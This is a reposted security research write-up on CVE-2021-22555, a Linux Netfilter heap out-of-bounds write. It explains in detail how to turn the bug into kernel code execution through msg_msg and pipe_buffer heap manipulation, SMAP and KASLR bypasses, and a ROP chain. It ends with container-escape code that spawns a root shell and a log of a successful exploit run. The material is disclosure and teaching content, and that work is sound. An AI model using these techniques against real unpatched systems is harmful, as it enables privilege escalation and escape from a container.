CVE-2021-22555: Turning \x00\x00 into 10000$ - FreeBuf

FreeBuf_307936 2021-07-16 19:33:23 309566

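CVE-2021-22555 is a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter that is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break the kubernetes pod isolation of the kCTF cluster and won 10000$ for charity (Google will match and double the donation to 20000$).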

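Introduction

After BleedingTooth, which was the first time I looked into Linux, I again wanted to find a privilege escalation vulnerability. I started by looking at old vulnerabilities such as CVE-2016-3134 and CVE-2016-4997, which inspired me to grep for memcpy() and memset() in the Netfilter code. This led me to some buggy code.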

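Vulnerability

When IPT_SO_SET_REPLACE or IP6T_SO_SET_REPLACE is called in compatibility mode (which requires CAP_NET_ADMIN), structures need to be converted from user to kernel as well as from 32-bit to 64-bit so that the native functions can process them. Naturally, this is destined to be error-prone. Our vulnerability is in xt_compat_target_from_user(), where memset() is called at the offset target->targetsize, an offset that is not accounted for during allocation. This leads to a few bytes being written out of bounds.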

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->u.user.name)];

    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);

    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    module_put(target->me);
    strncpy(t->u.user.name, name, sizeof(t->u.user.name));

    *size += off;
    *dstptr += tsize;
}

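targetsize is not controllable by the user, but one can choose targets with different structure sizes by name (such as TCPMSS, TTL or NFQUEUE). The bigger targetsize is, the more we can vary the offset. The target size must not be 8-byte aligned, however, in order to satisfy pad > 0. The biggest suitable structure I found is NFLOG, for which we can choose an offset of up to 0x4C bytes out of bounds (one can influence the offset by adding padding between struct xt_entry_match and struct xt_entry_target).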

struct xt_nflog_info {
    /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
    __u32   len;
    __u16   group;
    __u16   threshold;
    __u16   flags;
    __u16   pad;
    char        prefix[64];
};
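
The padding arithmetic behind the NFLOG choice can be checked in user space. The following is only a sketch: struct nflog_info_model, MODEL_XT_ALIGN and xt_pad_bytes are hypothetical names introduced here, and the 8-byte alignment is an assumption that holds for XT_ALIGN on 64-bit kernels.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User-space model of struct xt_nflog_info using fixed-width types. */
struct nflog_info_model {
    uint32_t len;
    uint16_t group;
    uint16_t threshold;
    uint16_t flags;
    uint16_t pad;
    char     prefix[64];
};

/* The structure is 0x4C bytes long, so it is not a multiple of 8. */
_Static_assert(sizeof(struct nflog_info_model) == 0x4c, "unexpected layout");

/* Assumption: XT_ALIGN rounds up to the next multiple of 8 bytes. */
#define MODEL_XT_ALIGN(s) (((size_t)(s) + 7u) & ~(size_t)7u)

/* Number of zero bytes that memset() writes right after the target data. */
static size_t xt_pad_bytes(size_t targetsize)
{
    return MODEL_XT_ALIGN(targetsize) - targetsize;
}
```

Under these assumptions, xt_pad_bytes(sizeof(struct nflog_info_model)) evaluates to 4: four zero bytes are written starting 0x4C bytes past the target data, while an 8-byte-aligned target would yield a pad of 0 and never reach the memset().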

Note that the destination buffer is allocated with GFP_KERNEL_ACCOUNT and can also vary in size:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
    struct xt_table_info *info = NULL;
    size_t sz = sizeof(*info) + size;

    if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
        return NULL;

    info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
    if (!info)
        return NULL;

    memset(info, 0, sizeof(*info));
    info->size = size;
    return info;
}

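However, the minimum size is greater than 0x100, which means that the smallest slab this object can be allocated in is kmalloc-512. In other words, we have to find victims that are allocated between kmalloc-512 and kmalloc-8192 in order to exploit the bug.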
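
To make the slab reasoning concrete, here is a rough model of how a request size maps to a kmalloc cache. kmalloc_bucket is a hypothetical helper, and it assumes power-of-two caches only (the real allocator also has kmalloc-96 and kmalloc-192, which do not matter above 0x100).

```c
#include <assert.h>
#include <stddef.h>

/* Smallest power-of-two kmalloc cache that can hold `size` bytes.
 * Assumption: only power-of-two caches from 8 to 8192 bytes exist. */
static size_t kmalloc_bucket(size_t size)
{
    size_t bucket = 8;

    assert(size > 0 && size <= 8192);
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}
```

With this model, any size just above 0x100 lands in kmalloc-512, which matches the lower bound stated above.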

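Exploitation

Our primitive is limited to writing four zero bytes at up to 0x4C bytes out of bounds. With such a primitive, the usual targets are: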

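Reference counter: Unfortunately, I could not find any suitable object with a reference counter in its first 0x4C bytes.
Free list pointer: CVE-2016-6187: Exploiting Linux kernel heap off-by-one is a good example of how to exploit the free list pointer. However, that technique is already five years old, and in the meantime kernels have enabled the CONFIG_SLAB_FREELIST_HARDENED option, which among other things protects free list pointers.
Pointer in a struct: This is the most promising approach, but four zero bytes are too many to write. For example, the pointer 0xffff91a49cb7f000 could only be turned into 0xffff91a400000000 or 0x9cb7f000, both of which would likely be invalid pointers. On the other hand, if we use the primitive to write at the very beginning of the adjacent block, we can write fewer bytes, e.g. 2 bytes, and for example turn a pointer from 0xffff91a49cb7f000 into 0xffff91a49cb70000.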
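
The pointer examples above can be reproduced with a small helper. This is an illustrative sketch only: zero_bytes is a hypothetical function, and byte 0 denotes the least significant byte, which is the first byte in memory on little-endian x86-64.

```c
#include <assert.h>
#include <stdint.h>

/* Clear `count` bytes of a 64-bit value, starting at byte index `first`
 * (byte 0 is the least significant byte). */
static uint64_t zero_bytes(uint64_t value, unsigned first, unsigned count)
{
    assert(first + count <= 8);
    for (unsigned i = first; i < first + count; i++)
        value &= ~((uint64_t)0xff << (8 * i));
    return value;
}
```

zero_bytes(0xffff91a49cb7f000, 0, 4) and zero_bytes(0xffff91a49cb7f000, 4, 4) give the two unusable results of a full four-byte write, while zero_bytes(0xffff91a49cb7f000, 0, 2) gives the partial overwrite that keeps the pointer inside the heap.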

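While experimenting with some victim objects, I noticed that on kernel version 5.4 I could never reliably allocate them around struct xt_table_info. I realized that this had to do with the GFP_KERNEL_ACCOUNT flag, since other objects allocated with GFP_KERNEL_ACCOUNT did not have this problem. Jann Horn confirmed that before 5.9, separate slabs were used to implement accounting. Therefore, every heap primitive in our exploit chain should also use GFP_KERNEL_ACCOUNT.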

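The msgsnd() system call is a well-known heap-spraying primitive (it uses GFP_KERNEL_ACCOUNT) and has been used in several public exploits. Surprisingly, however, its struct msg_msg has never been abused. In this write-up, we show how this data structure can be abused to obtain a use-after-free primitive, which in turn can be used to leak addresses and fake other objects. Coincidentally, in parallel with my research in March 2021, Alexander Popov explored the very same structure in Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel.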

Exploring struct msg_msg

When data is sent with msgsnd(), the payload is split into multiple segments:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG);
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen;
    pseg = &msg->next;
    while (len > 0) {
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG);
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
        if (seg == NULL)
            goto out_err;
        *pseg = seg;
        seg->next = NULL;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

where struct msg_msg and struct msg_msgseg are defined as:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h
/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h
struct list_head {
    struct list_head *next, *prev;
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msgseg {
    struct msg_msgseg *next;
    /* the next part of the message follows immediately */
};
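
The sizes that alloc_msg() requests follow directly from these headers. The sketch below models that arithmetic in user space; the MODEL_* constants and both helpers are hypothetical names, and the header sizes (48 and 8 bytes) and the 4096-byte page size are assumptions valid for x86-64.

```c
#include <assert.h>
#include <stddef.h>

/* Assumptions: 4096-byte pages and a 64-bit kernel, where
 * sizeof(struct msg_msg) == 48 and sizeof(struct msg_msgseg) == 8. */
#define MODEL_PAGE_SIZE   ((size_t)4096)
#define MODEL_MSG_HDR     ((size_t)48)
#define MODEL_SEG_HDR     ((size_t)8)
#define MODEL_DATALEN_MSG (MODEL_PAGE_SIZE - MODEL_MSG_HDR)
#define MODEL_DATALEN_SEG (MODEL_PAGE_SIZE - MODEL_SEG_HDR)

/* Size of the first kmalloc() request for a payload of `len` bytes. */
static size_t first_alloc_size(size_t len)
{
    size_t alen = len < MODEL_DATALEN_MSG ? len : MODEL_DATALEN_MSG;

    return MODEL_MSG_HDR + alen;
}

/* Number of struct msg_msgseg segments chained behind the header. */
static size_t segment_count(size_t len)
{
    size_t alen = len < MODEL_DATALEN_MSG ? len : MODEL_DATALEN_MSG;
    size_t segs = 0;

    len -= alen;
    while (len > 0) {
        alen = len < MODEL_DATALEN_SEG ? len : MODEL_DATALEN_SEG;
        len -= alen;
        segs++;
    }
    return segs;
}
```

Under these assumptions, a payload of 4096 - 48 bytes fills exactly one kmalloc-4096 object with no extra segment, and a payload of 1024 - 48 bytes fills exactly one kmalloc-1024 object.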

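The first member of struct msg_msg is the m_list.next pointer, which points to another message in the queue (this is different from next, which is a pointer to the next segment). As we will see below, this is a perfect candidate to corrupt.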

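Achieving use-after-free

First, we initialize a large number of message queues with msgget() (4096 in our case). Then, we use msgsnd() to send one message of size 4096 (including the struct msg_msg header) to each message queue; we call these primary messages. Eventually, after many messages, some of them are consecutive: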

Figure 1: A series of blocks of primary messages

Next, we use msgsnd() to send a secondary message of size 1024 to each message queue:

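Figure 2: A series of blocks of primary messages pointing to secondary messages

Finally, we create some holes in the primary messages (in our case, every 1024th one) and trigger the vulnerable setsockopt(IPT_SO_SET_REPLACE) call, which, in the best case, allocates the struct xt_table_info object in one of the holes:

Figure 3: An xt_table_info allocated in between the blocks, corrupting the next pointer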

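We choose to overwrite two bytes of the adjacent object with zeros. Assuming we are adjacent to another primary message, the bytes we overwrite are part of the pointer to the secondary message. Since secondary messages are allocated with a size of 1024 bytes, we have a $1 - (1024 / 65536)$ chance of redirecting the pointer (the only case in which we fail is when the two least significant bytes of the pointer are already zero).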
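
The probability can be verified by enumeration. The sketch below walks every 1024-byte-aligned slot in one 64 KiB window and counts how many pointers actually change when their low 16 bits are cleared; clear_low16 and count_slots are hypothetical names, and the window base is an arbitrary illustrative address.

```c
#include <assert.h>
#include <stdint.h>

/* Effect of the two-byte zero write on a little-endian pointer. */
static uint64_t clear_low16(uint64_t ptr)
{
    return ptr & ~(uint64_t)0xffff;
}

/* Count all 1024-byte-aligned slots in one 64 KiB window (only_changed == 0)
 * or only the slots whose pointer is modified by the overwrite. */
static unsigned count_slots(int only_changed)
{
    const uint64_t window = 0xffff91a49cb70000ULL; /* illustrative base */
    unsigned n = 0;

    for (uint64_t off = 0; off < 65536; off += 1024) {
        uint64_t ptr = window + off;

        if (!only_changed || clear_low16(ptr) != ptr)
            n++;
    }
    return n;
}
```

Of the 64 possible slots, 63 are redirected, and 63/64 equals $1 - (1024 / 65536)$.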

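Now, the best case we can hope for is that the manipulated pointer also points to a secondary message. The consequence is two different primary messages pointing to the same secondary message, which leads to a use-after-free:

Figure 4: Two primary messages pointing to the same secondary message because of the corrupted pointer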

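However, how do we know which two primary messages point to the same secondary message? To answer this question, we tag every primary and secondary message with the index of its message queue, which lies in $[0, 4096)$. Then, after triggering the corruption, we iterate through all message queues, peek at every message using msgrcv() with MSG_COPY, and check whether the tags match. If the tag of the primary message differs from the tag of the secondary message, the pointer has been redirected. In that case, the tag of the primary message is the index of the fake message queue, i.e. the one containing the wrong secondary message, and the tag of the wrong secondary message is the index of the real message queue. Knowing these two indices, achieving a use-after-free is trivial: we fetch the secondary message from the real message queue with msgrcv() and thereby free it.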
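
The tag comparison can be modelled without touching any message queue. In this sketch, the two arrays stand in for the tags that would be peeked from the first and second message of each queue; find_redirected and its parameters are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

/* primary_tag[i] and secondary_tag[i] are the tags read from the primary and
 * secondary message reachable through queue i. Returns 1 and fills in both
 * indices when a mismatch is found, 0 otherwise. */
static int find_redirected(const int *primary_tag, const int *secondary_tag,
                           size_t n, int *fake_idx, int *real_idx)
{
    for (size_t i = 0; i < n; i++) {
        if (primary_tag[i] != secondary_tag[i]) {
            *fake_idx = primary_tag[i];   /* queue with the corrupted pointer */
            *real_idx = secondary_tag[i]; /* queue that really owns the message */
            return 1;
        }
    }
    return 0;
}
```

For example, if the tags seen through queue 5 are 5 for the primary message but 2 for the secondary one, the function reports fake_idx 5 and real_idx 2, so the shared message would be freed through queue 2.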

Figure 5: Freed secondary message with a stale reference

Note that we still hold a reference to the freed message in the fake message queue.

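Bypassing SMAP

Using unix sockets (which can be set up easily with socketpair()), we now spray a large number of messages of size 1024 that imitate the struct msg_msg header. Ideally, we reclaim the address of the previously freed message:

Figure 6: Fake struct msg_msg put in place of the freed secondary message

Note that m_list.next is 41414141, because we do not know any kernel address yet (with SMAP enabled, we cannot specify a user address). Lacking a kernel address is a serious limitation, because it prevents us from freeing the block again (why we want to do that becomes clear later). The reason is that during msgrcv(), the message is unlinked from the message queue, which is a circular list. Luckily, we are in a good position to achieve an information leak, as struct msg_msg has some interesting fields. Namely, the field m_ts determines how much data is returned to userland: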

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;
    size_t alen;

    if (src->m_ts > dst->m_ts)
        return ERR_PTR(-EINVAL);

    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen);

    ...
    return dst;
}

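The original size of the message is only 1024-sizeof(struct msg_msg) bytes, which we can now artificially increase to DATALEN_MSG=4096-sizeof(struct msg_msg). As a consequence, we can read past the intended message size and leak the struct msg_msg header of the adjacent message. As said before, the message queue is implemented as a circular list, so m_list.next points back to the primary message.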
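
The over-read can be illustrated with a user-space model of two adjacent 1024-byte chunks. This is a sketch under stated assumptions, not kernel code: struct msg_hdr_model mirrors the 48-byte header on x86-64, model_copy and leak_adjacent_next are hypothetical helpers, and the inflated size covers only two chunks instead of DATALEN_MSG to keep the example short.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { CHUNK = 1024 };

/* User-space model of the 48-byte struct msg_msg header on x86-64. */
struct msg_hdr_model {
    uint64_t m_list_next, m_list_prev;
    uint64_t m_type, m_ts;
    uint64_t next, security;
};

/* Mimic the copy: return m_ts bytes starting right after the header. */
static size_t model_copy(const uint8_t *chunk, uint8_t *out, size_t out_len)
{
    struct msg_hdr_model hdr;

    memcpy(&hdr, chunk, sizeof(hdr));
    assert(hdr.m_ts <= out_len);
    memcpy(out, chunk + sizeof(hdr), hdr.m_ts);
    return hdr.m_ts;
}

/* Build two adjacent chunks, inflate m_ts of the first one, and recover the
 * m_list.next field of the second header from the copied data. */
static uint64_t leak_adjacent_next(uint64_t adjacent_next)
{
    static uint8_t slab[2 * CHUNK], out[2 * CHUNK];
    struct msg_hdr_model fake = { .m_ts = 2 * CHUNK - sizeof(fake) };
    struct msg_hdr_model neighbour = { .m_list_next = adjacent_next,
                                       .m_ts = CHUNK - sizeof(neighbour) };
    struct msg_hdr_model leaked;

    memcpy(slab, &fake, sizeof(fake));
    memcpy(slab + CHUNK, &neighbour, sizeof(neighbour));
    model_copy(slab, out, sizeof(out));
    /* The neighbouring header starts CHUNK - sizeof(header) bytes into the data. */
    memcpy(&leaked, out + CHUNK - sizeof(leaked), sizeof(leaked));
    return leaked.m_list_next;
}
```

In this model, the adjacent header shows up 1024 - 48 = 976 bytes into the returned data, which is where the m_list.next value of the neighbouring message would be read from.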

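Knowing the address of a primary message, we can re-craft the fake struct msg_msg with that address as next (meaning that it is the next segment). The content of the primary message can then be leaked by reading more than DATALEN_MSG bytes. The m_list.next pointer leaked from the primary message reveals the address of the secondary message that is adjacent to our fake struct msg_msg. Subtracting 1024 from that address finally gives us the address of the fake message.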

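Achieving a better use-after-free

Now, we can rebuild the fake struct msg_msg object with the leaked address as both m_list.next and m_list.prev (meaning that it points to itself), which makes the fake message free-able through the fake message queue.

Figure 7: Fake struct msg_msg with a valid next pointer pointing to itself

Note that when spraying with unix sockets, we actually have a struct sk_buff object that points to the fake message. Obviously, this means that when we free the fake message, we still hold a stale reference:

Figure 8: Freed fake message with a stale reference

This stale struct sk_buff data buffer is a better use-after-free scenario, because it contains no header information, meaning that we can now use it to free any kind of object on the slab. In comparison, freeing a struct msg_msg object is only possible if its first two members are writable pointers (needed to unlink the message).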

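Finding a victim

The best victim to attack is one that has a function pointer in its structure. Remember that the victim must also be allocated with GFP_KERNEL_ACCOUNT.

Talking to Jann Horn, he suggested the struct pipe_buffer object, which is allocated in kmalloc-1024 (this is why the secondary messages are 1024 bytes). struct pipe_buffer can be allocated easily with pipe(), which calls alloc_pipe_info() as a subroutine: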

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    ...
}

Although it does not contain a function pointer directly, it contains a pointer to struct pipe_buf_operations, which does have function pointers:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};
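
Why the pipe_buffer array ends up in kmalloc-1024 follows from the structure layout. The sketch below models it in user space; struct pipe_buffer_model is a hypothetical stand-in that writes pointers and unsigned long as uint64_t (x86-64 assumed), and the default of 16 buffers is taken from PIPE_DEF_BUFFERS.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User-space model of struct pipe_buffer on x86-64. */
struct pipe_buffer_model {
    uint64_t page;          /* struct page * */
    uint32_t offset, len;
    uint64_t ops;           /* const struct pipe_buf_operations * */
    uint32_t flags;         /* followed by 4 bytes of padding */
    uint64_t private_data;  /* unsigned long private */
};

enum { MODEL_PIPE_DEF_BUFFERS = 16 }; /* value of PIPE_DEF_BUFFERS */

/* Bytes requested by the kcalloc() call in alloc_pipe_info(). */
static size_t pipe_bufs_alloc_size(void)
{
    return MODEL_PIPE_DEF_BUFFERS * sizeof(struct pipe_buffer_model);
}
```

With a 40-byte structure, the array is 640 bytes long, which is too large for kmalloc-512 and therefore served from kmalloc-1024. The ops pointer of the first entry sits at offset 16 of that allocation.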

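Bypassing KASLR/SMEP

When one writes to a pipe, struct pipe_buffer is populated. Most importantly, ops will point to the static structure anon_pipe_buf_ops, which resides in the .data segment: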

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
    .release    = anon_pipe_buf_release,
    .try_steal  = anon_pipe_buf_try_steal,
    .get        = generic_pipe_buf_get,
};

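Since the difference between the .data segment and the .text segment is always the same, having anon_pipe_buf_ops basically allows us to calculate the kernel base address.

We spray a large number of struct pipe_buffer objects and reclaim the location of the stale struct sk_buff data buffer:

Figure 9: Freed fake message reclaimed with a struct pipe_buffer

Since we still hold a reference from the struct sk_buff, we can read its data buffer, leak the content of struct pipe_buffer and reveal the address of anon_pipe_buf_ops: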

[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000
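
The base address calculation is a single subtraction. In the sketch below, the offset is simply the difference between the two addresses printed above; it is specific to that kernel build and would differ elsewhere. ANON_PIPE_BUF_OPS_OFFSET, kernel_base and relocate are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Build-specific offset of anon_pipe_buf_ops from the kernel base, derived
 * from the two addresses in the log above (an assumption for other builds). */
#define ANON_PIPE_BUF_OPS_OFFSET 0x1078380ULL

/* Kernel base computed from the leaked ops pointer. */
static uint64_t kernel_base(uint64_t leaked_ops)
{
    return leaked_ops - ANON_PIPE_BUF_OPS_OFFSET;
}

/* Runtime address of a symbol given its offset from the kernel base. */
static uint64_t relocate(uint64_t kbase, uint64_t offset)
{
    return kbase + offset;
}
```

Applied to the leaked value ffffffffa1e78380, kernel_base() yields ffffffffa0e00000, matching the log.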

With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well:

Figure 10: Freed struct pipe_buffer with a stale reference

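Escalating privileges

We reclaim the stale struct pipe_buffer with a fake one whose ops points to a fake struct pipe_buf_operations. This fake structure is planted at the same location, since we know its address. Obviously, it should contain a malicious function pointer as release:

Figure 11: Freed struct pipe_buffer reclaimed with a fake struct pipe_buffer

The final stage of the exploit is to close all pipes in order to trigger release, which in turn kicks off the JOP chain. Finding JOP gadgets is hard, so the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain.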

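Kernel ROP chain

We save the value of RBP at some scratchpad address in the kernel so that we can resume execution later. Then we call commit_creds(prepare_kernel_cred(NULL)) to install kernel credentials, and finally we call switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) to switch the namespaces of process 1 to those of the init process. After that, we restore the value of RBP and return to resume execution (which immediately makes free_pipe_info() return).

Escaping the container and popping a root shell

Back in userland, we now have root permissions to change the mnt, pid and net namespaces, which lets us escape the container and break out of the kubernetes pod. Ultimately, we pop a root shell.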

setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);

char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);

PoC

The proof-of-concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555

Executing it on a vulnerable machine will grant you root:

theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#

Timeline

2021-04-06 - Vulnerability reported to security@kernel.org.
2021-04-13 - Patch merged upstream.
2021-07-07 - Public disclosure.

Thanks

Eduardo Vela
Francis Perron
Jann Horn

Original author: Andy Nguyen (theflow@)
Original article: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

This article reflects the independent views of FreeBuf_307936. Reproduction without authorization is prohibited.